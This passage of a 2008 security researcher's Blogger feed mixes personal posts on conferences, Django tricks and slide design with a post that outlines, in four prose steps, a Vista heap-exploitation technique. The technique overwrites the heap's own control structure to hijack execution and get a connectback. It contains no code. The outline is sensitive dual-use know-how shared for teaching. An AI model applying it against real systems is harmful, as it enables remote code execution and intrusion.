bello'/><category scheme='http://www.blogger.com/atom/ns#' term='credential reflection attack'/><category scheme='http://www.blogger.com/atom/ns#' term='canvas'/><title type='text'>In my free time...</title><content type='html'>I torture &lt;a href="http://www.lucianobello.com.ar"&gt;Luciano Bello&lt;/a&gt; by texting him "// MD_Update". That's the most popular Argentinian hobby after soccer.&lt;br /&gt;&lt;br /&gt;In other news, a cool post by Bas on &lt;a href="http://forum.immunityinc.com/index.php?topic=277.0"&gt;credential reflection attacks with CANVAS&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Peace&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-5712726095800414730?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/5712726095800414730/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=5712726095800414730' title='5 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5712726095800414730'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5712726095800414730'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/12/in-my-free-time.html' title='In my free time...'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-3155611314809254384</id><published>2008-12-18T05:17:00.001-08:00</published><updated>2008-12-18T05:25:48.921-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='immunity debugger'/><category scheme='http://www.blogger.com/atom/ns#' term='ben hawkes'/><category scheme='http://www.blogger.com/atom/ns#' term='heap overflow'/><title type='text'>If you are doing your homework correctly, you will get...</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_aUReV5sSeqk/SUpNoFvYvLI/AAAAAAAAEqI/oIIn4NcRSnw/s1600-h/classexercise.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://1.bp.blogspot.com/_aUReV5sSeqk/SUpNoFvYvLI/AAAAAAAAEqI/oIIn4NcRSnw/s320/classexercise.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5281118864176364722" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;That's &lt;a href="http://www.ruxcon.org.au/files/2008/hawkes_ruxcon.pdf"&gt;Ben Hawkes'&lt;/a&gt; technique working on Vista for me. The chunk you see at FreeList entry 127 is nothing more than the heap itself.&lt;br /&gt;&lt;br /&gt;Guess what will happen next when I request an allocation of the global heap's size? 
I'll leave that answer, and the whole exercise, for the students in February.&lt;br /&gt;&lt;br /&gt;I wonder what debugger Ben Hawkes uses?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-3155611314809254384?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/3155611314809254384/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=3155611314809254384' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3155611314809254384'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3155611314809254384'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/12/if-you-are-doing-your-homework.html' title='If you are doing your homework correctly, you will get...'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_aUReV5sSeqk/SUpNoFvYvLI/AAAAAAAAEqI/oIIn4NcRSnw/s72-c/classexercise.png' height='72' width='72'/><thr:total>0</thr:total></entry>
<entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-5217457028093422990</id><published>2008-12-08T15:01:00.000-08:00</published><updated>2008-12-18T16:07:54.951-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tokyo'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='ben 
hawkes'/><category scheme='http://www.blogger.com/atom/ns#' term='heap overflow'/><title type='text'>Things to do in Japan, if you want to exploit the heap</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm1.static.flickr.com/18/23407217_a563c3780c.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 374px;" src="http://farm1.static.flickr.com/18/23407217_a563c3780c.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dear diary,&lt;br /&gt;   Sorry I have been sucking at blogging, but the truth is I didn't do anything interesting these days, technically at least. Unless, of course, you are part of some extinct cult that worships Django.&lt;br /&gt;&lt;br /&gt;   Anyway, since last Friday I started updating my slides for the training I'm giving with the people of &lt;a href="http://cyberdefense.jp/service_seminar/seminar07.html"&gt;cyberdefense&lt;/a&gt; about &lt;a href="http://www.immunityinc.com/education-currentschedule.shtml"&gt;heap exploitation&lt;/a&gt; in Tokyo (which, I must say, if you are interested you should rush to reserve your seat for, since it's filling up quite quickly).&lt;br /&gt;   I updated the information about Windows 2003/XP SP2 exploitation, including theory and a bunch of exercises (students will end up exploiting Brett Moore's Citrix Metaframe bug).&lt;br /&gt;   I'm also updating the Vista part, which was always the critical part of the class, since I gave it on the last day and people were really tired by then (and it was a lot of information about all the changes in the new implementation and ideas about how to exploit it).&lt;br /&gt;   And by doing some research I stumbled onto &lt;a href="http://www.ruxcon.org.au/2008-archive.shtml"&gt;Ben Hawkes' "Attacking the Vista Heap"&lt;/a&gt; from the RUXCON conference. 
&lt;br /&gt;   When I think about heap exploitation, or even exploitation in general, I can't stop thinking at a remote level; it's probably my weakness but also my strength. And it is obviously a consequence of a background in Linux exploitation when I was a kid.&lt;br /&gt;   Did I ever tell you, dear diary, that I did Linux exploitation like all good boy scouts? Same as Bas, same as Sinan... and I spent 8 good months doing that for CANVAS until Dave said "Windows time", and we all had to switch :&gt;.&lt;br /&gt;   So when I heard about Ben Hawkes' technique of writing the global heap structure (PHEAP from now on), I thought it was a good idea (I even thought about it before reading it), but I didn't see a real use for it remotely: possible, but not that simple to implement. (On remote heap exploitation, you should always follow Sinan's law: if the technique has more steps than the strawberry pudding recipe, it isn't worth it.) &lt;br /&gt;    But BANG! I read Ben Hawkes' slides. And that was a jaw breaker!&lt;br /&gt;    Why? Because he follows the cliché phrase of Einstein: "&lt;span style="font-style:italic;"&gt;Everything should be made as simple as possible, but not simpler.&lt;/span&gt;"&lt;br /&gt;    Basically he asked himself: what would you do if you could overwrite a pointer to a heap chunk with whatever you want? And he answered it quite simply: point it to a different busy chunk.&lt;br /&gt;    And the math is simple: if you point the chunk's pointer to a different busy chunk, then when the original chunk gets freed it is the busy chunk that goes back to the system. So the next allocation of the same size will return the chunk that wasn't supposed to be free, and you will be able to overwrite the data of that busy chunk.&lt;br /&gt;    Don't rush your rants: he is obviously not pointing the chunk's pointer into a random busy chunk on the heap; that would be almost impossible to exploit reliably. 
Ben's magic goes much further.&lt;br /&gt;    And this is the nice trick: he basically makes the pointer land on the PHEAP, and since the PHEAP is actually a chunk, the first of its own heap, he makes the PHEAP chunk available for use by someone else. And if you combine that with a strdup [alloc/memcpy(yourstring)], you get realistic Vista heap exploitation, without really relying on any -real- implementation trick.&lt;br /&gt;    And you don't need to know the address of the PHEAP; you probably just need to zero out the last digits of the pointed chunk address (0x00452880 into 0x00452000, it depends obviously).&lt;br /&gt;    So the steps you have to do are quite simple:&lt;br /&gt;    1) Play with the heap in order to get a chunk's pointer next to your overwriting chunk&lt;br /&gt;    2) Overwrite the last digits of that pointer to make it point to the PHEAP&lt;br /&gt;    3) Find a strdup, send a string, and overwrite the PHEAP including the heap cookie and the RtlCommitRoutine.&lt;br /&gt;    4) Trigger some allocation extension and welcome your connectback!&lt;br /&gt;&lt;br /&gt;    Or you can do it in one big step, which is visiting me in Tokyo in February :&gt;&lt;br /&gt;&lt;br /&gt;Anyways, cheers to Ben for this great technique!
I wishing to exchange some beers/wine some day!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-5217457028093422990?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/5217457028093422990/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=5217457028093422990' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5217457028093422990'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5217457028093422990'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/12/thinks-to-do-in-japan-if-you-want-to.html' title='Things to do in Japan, if you want to exploit the heap'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm1.static.flickr.com/18/23407217_a563c3780c_t.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-3593374778373752841</id><published>2008-11-12T12:55:00.000-08:00</published><updated>2008-11-12T15:00:16.820-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='brazil'/><category scheme='http://www.blogger.com/atom/ns#' term='h2hc'/><category scheme='http://www.blogger.com/atom/ns#' term='keynote'/><title type='text'>H2HC Brazil</title><content type='html'>I'm back for a 4 days trip to Brazil for the H2HC 
conference.&lt;br /&gt;This year it was held in the beautiful city of Sao Paulo, which turned out to be huge, with about 11 million people in 1500 square kilometers.&lt;br /&gt;Sao Paulo is well known for its street art; they have graffiti all around the city and apparently the thing there is who makes the graffiti in the most extreme place, so they go from your regular Joe's house to the 8th floor front of a big building, they even paint on churches and big advertising signs (although usually the most extreme ones are just letters in black).&lt;br /&gt;&lt;br /&gt;&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.ggpht.com/_aUReV5sSeqk/SRYpTBEtqRI/AAAAAAAADOM/5RZoD_Qurn8/s576/dsc01147.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 576px; height: 432px;" src="http://lh4.ggpht.com/_aUReV5sSeqk/SRYpTBEtqRI/AAAAAAAADOM/5RZoD_Qurn8/s576/dsc01147.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Anyways, I gave a keynote for the first time in my life and I believe it worked out pretty well, people seemed to have fun even though they didn't laugh at my "the Simpsons taught me you speak Spanish" joke to break the ice. A lot of people noticed the effort I put into the design and congratulated me on that, it was worth the effort for sure!
If you want to take a look at it, it can be downloaded &lt;a href="http://www.immunityinc.com/downloads/ApologyofOdays.pdf"&gt;HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;After me, Edgard Barbosa talked about the new framework they are releasing for hypervisors and it seems pretty nice, I'll be waiting for the binary release (check the &lt;a href="http://www.coseinc.com/"&gt;COSEINC&lt;/a&gt; website for more info).&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh3.ggpht.com/_aUReV5sSeqk/SRYpbe37m3I/AAAAAAAADOs/mII_yZOTZkc/s576/dsc01153.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 576px; height: 432px;" src="http://lh3.ggpht.com/_aUReV5sSeqk/SRYpbe37m3I/AAAAAAAADOs/mII_yZOTZkc/s576/dsc01153.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Steve Adegbite gave a presentation about the new Microsoft program; I was too far from the speakers and couldn't get the whole presentation. I know he talked about the MS Ecosystem, which I'm subscribed to, so I will get the scoop from there.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh3.ggpht.com/_aUReV5sSeqk/SRYphfGD10I/AAAAAAAADPE/AV6JqgvGo5U/s400/dsc01165.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 300px; height: 400px;" src="http://lh3.ggpht.com/_aUReV5sSeqk/SRYphfGD10I/AAAAAAAADPE/AV6JqgvGo5U/s400/dsc01165.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pablo's presentation on DEP rocks! I'm not sure if everyone got the idea of how cool and useful the project he has been working on is.
He gave all the inside info, and I recommend checking out his slides for the &lt;a href="http://www.immunityinc.com/downloads/DEPLIB.pdf"&gt;whole thing&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;That's the last presentation I could see, since I spent my whole time at the Immunity booth we had at H2HC:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh6.ggpht.com/_aUReV5sSeqk/SRYpjIgLBxI/AAAAAAAADPM/UYRCrDCnXtM/s576/dsc01171.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 576px; height: 432px;" src="http://lh6.ggpht.com/_aUReV5sSeqk/SRYpjIgLBxI/AAAAAAAADPM/UYRCrDCnXtM/s576/dsc01171.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;But I did escape for a little peek at:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Francisco Amato on Evilgrade:&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh5.ggpht.com/_aUReV5sSeqk/SRYptTjRWHI/AAAAAAAADPg/4jyusKincME/s576/dsc01176.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 576px; height: 432px;" src="http://lh5.ggpht.com/_aUReV5sSeqk/SRYptTjRWHI/AAAAAAAADPg/4jyusKincME/s576/dsc01176.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Felibre Nobrega's Security on USB&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh5.ggpht.com/_aUReV5sSeqk/SRYpvxqvf7I/AAAAAAAADPw/qpDNisSv0HI/s576/dsc01186.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 576px; height: 432px;" src="http://lh5.ggpht.com/_aUReV5sSeqk/SRYpvxqvf7I/AAAAAAAADPw/qpDNisSv0HI/s576/dsc01186.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And Julio Auto's Reverse Engineering (whom I finally met.
Its a great and smart guy, too bad the presentation was in Portuguese):&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_aUReV5sSeqk/SRtezlgj9LI/AAAAAAAADVU/4vXqAetvFec/s1600-h/dsc01190.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 300px;" src="http://3.bp.blogspot.com/_aUReV5sSeqk/SRtezlgj9LI/AAAAAAAADVU/4vXqAetvFec/s400/dsc01190.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5267908429474952370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The conference was really good, I get to practice my non-existance portuguese with two TV Station that make me an interview (Which was basically me showing how to own machines with CANVAS) and spent good times with a lot of new friends.&lt;br /&gt;&lt;br /&gt;I would like to thanks Rodrigo "BSDaemon" Rubira Branco and Felipe Balestra for inviting us to the conference. They did an amazing job and I bet people will appreciate it.&lt;br /&gt;&lt;br /&gt;Nico&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-3593374778373752841?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/3593374778373752841/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=3593374778373752841' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3593374778373752841'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3593374778373752841'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/11/h2hc-brazil.html' title='H2HC 
Brazil'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_aUReV5sSeqk/SRYpTBEtqRI/AAAAAAAADOM/5RZoD_Qurn8/s72-c/dsc01147.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6119552547266699301</id><published>2008-11-01T14:54:00.000-07:00</published><updated>2008-11-01T15:19:15.313-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='group_by'/><category scheme='http://www.blogger.com/atom/ns#' term='django'/><category scheme='http://www.blogger.com/atom/ns#' term='sao paulo'/><category scheme='http://www.blogger.com/atom/ns#' term='python'/><category scheme='http://www.blogger.com/atom/ns#' term='h2hc'/><category scheme='http://www.blogger.com/atom/ns#' term='count'/><category scheme='http://www.blogger.com/atom/ns#' term='or'/><category scheme='http://www.blogger.com/atom/ns#' term='nop certification'/><title type='text'>Caipirinha and Python tricks</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/SQzVb8s2glI/AAAAAAAADJs/aDQBce_xJus/s1600-h/bee_on_polen.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 266px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/SQzVb8s2glI/AAAAAAAADJs/aDQBce_xJus/s400/bee_on_polen.jpg" alt="" id="BLOGGER_PHOTO_ID_5263816740616700498" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yes, I don't have anything to blog about. 
And I know the rule, "If you are not better than the silence, then shut up".&lt;br /&gt;But here I am, being part of the interweb, where everyone shows and nobody watches.&lt;br /&gt;&lt;br /&gt;Anyways, I've been doing a lot of Django development lately (yeah, that's -how- flexible my work is) and since we have to do a lot of things dynamically, I will show you a couple of tricks that might be useful.&lt;br /&gt;&lt;br /&gt;First, I have been learning Lisp in my free time, and that is why lately my code is all one-liners:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;if a ? b : c&lt;/b&gt;&lt;br /&gt;in python (the "true" branch goes second, because a true condition indexes element 1 of the tuple):&lt;br /&gt;   ( c, b)[ bool(a) ]&lt;br /&gt;example:&lt;br /&gt;   ("bigger or equal", "smaller") [ a &lt; 20 ]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;dynamic arguments:&lt;/b&gt;&lt;br /&gt; function( *a, **b)&lt;br /&gt;example:&lt;br /&gt; function( **{ 'name': 'nico'} )&lt;br /&gt; is the same as: function(name="nico")&lt;br /&gt;&lt;br /&gt;Django's tricks:&lt;br /&gt;&lt;b&gt;Model's OR search&lt;/b&gt;:&lt;br /&gt;from django.db.models import Q&lt;br /&gt;model.objects.filter( Q(name="nico") | Q(lastname="waisman") )&lt;br /&gt;&lt;br /&gt;&lt;b&gt;COUNT and GROUP BY (undocumented):&lt;/b&gt;&lt;br /&gt;Find the names that are repeated the most:&lt;br /&gt;c = model.objects.extra( select = {'entry_count': "count(name)"} )&lt;br /&gt;c.query.group_by = ['name']&lt;br /&gt;&lt;br /&gt;The information can be read from each result object by accessing the "entry_count" field. This will be unsorted; if you want to get the top 5 then (I wish there were another way, but couldn't find it):&lt;br /&gt;names = sorted( c, key=lambda x: x.entry_count, reverse=True )[:5]&lt;br /&gt;&lt;br /&gt;Don't you love lambda?
Once you get used to the whole map, filter and reduce is like heroin, impossible to quit, unless you get into religion.&lt;br /&gt;&lt;br /&gt;Now the Caipirinha part of the post: Next thursday Pablo Solé and I will be flying to  the beatiful city of Sao Paulo in Brazil to present at the &lt;a href="http://www.h2hc.org.br/"&gt;H2HC&lt;/a&gt; conference. Immunity will have a booth, so please came by to said hi so we don't feel lonely :).&lt;br /&gt;We will be doing the NOP certification for the first time in latin america, so if you are around and hungry for stack overflows, contact us!&lt;br /&gt;&lt;br /&gt;Peace&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6119552547266699301?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6119552547266699301/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6119552547266699301' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6119552547266699301'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6119552547266699301'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/11/caipirinha-and-python-tricks.html' title='Caipirinha and Python tricks'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 
url='http://4.bp.blogspot.com/_aUReV5sSeqk/SQzVb8s2glI/AAAAAAAADJs/aDQBce_xJus/s72-c/bee_on_polen.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-8207138939071809198</id><published>2008-10-26T14:08:00.000-07:00</published><updated>2008-10-26T17:43:08.184-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugs'/><category scheme='http://www.blogger.com/atom/ns#' term='slides'/><category scheme='http://www.blogger.com/atom/ns#' term='design'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Thoughts on slide design</title><content type='html'>One of the things researchers should think about, whether they like it or not, is slide design.&lt;br /&gt;Showing your results is an important part of the research, because it's the point where you justify the budget invested. Obviously, there is no need for slides when you've got a remote on IIS 6, but for those of us who are mortals (a.k.a. non-Sinans) we need to show pretty things and make people happy.&lt;br /&gt;This not only applies to business meetings but, most importantly, to conferences.&lt;br /&gt;How many times have you spent looking at lousy slides, full of bullet points that are halfway between a paper and presentation slides? The truth is, as Dave says, you have two types of audience: the one at the conference and the people that will download the slides later.&lt;br /&gt;But even if you have to keep in mind the online audience, why not make your slides pretty?&lt;br /&gt;&lt;br /&gt;I have been researching the best way to improve my slides for the keynote I'm presenting at &lt;a href="http://www.h2hc.org.br/"&gt;H2HC&lt;/a&gt; in November.&lt;br /&gt;And here are some tips I have been collecting.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;It's not about the software&lt;/b&gt;&lt;br /&gt;I have always thought that OpenOffice was ugly, and it actually is.
But that doesn't mean you can't make a wonderful presentation with it. Just avoid using its features as much as possible. And if you have to do boxes, try to make them different from what they are supposed to be (drop the line, add transparency, shadow, use a non-default color, etc).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;DROP THE BULLET POINTS, USE IMAGES&lt;/span&gt;&lt;br /&gt;This is probably the best advice I can give. Your presentation gets to a completely new level when you start adding images. Whether you use them as background or as an accessory, you need to get good resolution images. Let me repeat this again because it is important, GOOD RESOLUTION. Don't accept anything less than 1024x768.&lt;br /&gt;If you can afford them, get them from &lt;a href="http://www.istockphoto.com/"&gt;www.istockphoto.com&lt;/a&gt;&lt;br /&gt;If you are a poor Argentinian, you can get a lot of amazing images from &lt;a href="http://www.flickr.com/"&gt;flickr.com&lt;/a&gt;; the "advanced search" allows you to search only for Creative Commons-licensed content.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Use the rule of thirds.&lt;/b&gt;&lt;br /&gt;I did a couple of photography courses in the past and one of the most important lessons I got on composition was the famous rule of thirds. Basically you need to draw invisible lines dividing your photo vertically and horizontally in 3 parts, leaving 9 squares.&lt;br /&gt;The points where the invisible lines cross each other are the golden points, which are the places where the viewer puts more emphasis when looking at a picture. A simple arrangement of the content can improve your slide a lot.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Balancing&lt;/b&gt;&lt;br /&gt;Your slide needs to be balanced.
If you put all the attention on one side of your slide, there has to be text or an image on the other side that can help the viewer keep their attention in the center of the image.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_aUReV5sSeqk/SQTc-p7iM0I/AAAAAAAADJc/sxUPFs55Spc/s1600-h/slide_balance.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 232px;" src="http://3.bp.blogspot.com/_aUReV5sSeqk/SQTc-p7iM0I/AAAAAAAADJc/sxUPFs55Spc/s400/slide_balance.jpg" alt="" id="BLOGGER_PHOTO_ID_5261573233641141058" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Just Phrases&lt;/b&gt;&lt;br /&gt;Try to avoid as much text as possible. Only use phrases that help you with your statement. Slides are usually there to support your presentation rather than repeat what you have said.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_aUReV5sSeqk/SQTdklMs0FI/AAAAAAAADJk/VD20kXmk-1I/s1600-h/phrase.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 232px;" src="http://1.bp.blogspot.com/_aUReV5sSeqk/SQTdklMs0FI/AAAAAAAADJk/VD20kXmk-1I/s400/phrase.jpg" alt="" id="BLOGGER_PHOTO_ID_5261573885205991506" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Slides take a tremendous amount of work that you might not be able to invest, but if you do it, you won't regret it.
But no matter how pretty you made your slides, at the end, it's always about the speaker.&lt;br /&gt;&lt;br /&gt;Peace&lt;br /&gt;&lt;br /&gt;PS: For those of us who can read spanish, the axolotl magazine has publish Cari's work on &lt;a href="http://www.revistaaxolotl.com.ar/esp28.htm"&gt;Heian's poetry&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-8207138939071809198?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/8207138939071809198/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=8207138939071809198' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8207138939071809198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8207138939071809198'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/10/thoughts-on-slide-design.html' title='Thoughts on slide design'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_aUReV5sSeqk/SQTc-p7iM0I/AAAAAAAADJc/sxUPFs55Spc/s72-c/slide_balance.jpg' height='72' 